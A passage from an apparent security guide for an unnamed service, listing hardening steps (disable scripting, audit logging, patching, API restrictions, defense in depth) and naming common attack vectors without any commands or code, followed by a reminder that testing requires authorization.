  6. Disable scripting - If not needed

  7. Monitor actively - Enable audit logging

  8. Regular updates - Apply security patches

  9. Limit API access - Restrict destructive operations

  10. Defense in depth - Multiple security layers

Attack Vectors:

  • No authentication (common default)

  • Default credentials

  • Information disclosure

  • Data exfiltration

  • Unauthorized modification

  • Script execution (older versions)

  • Directory traversal

  • API key theft

  • Privilege escalation

Remember to only perform these techniques during authorized security assessments. Unauthorized access is illegal and unethical.

Additional Resources
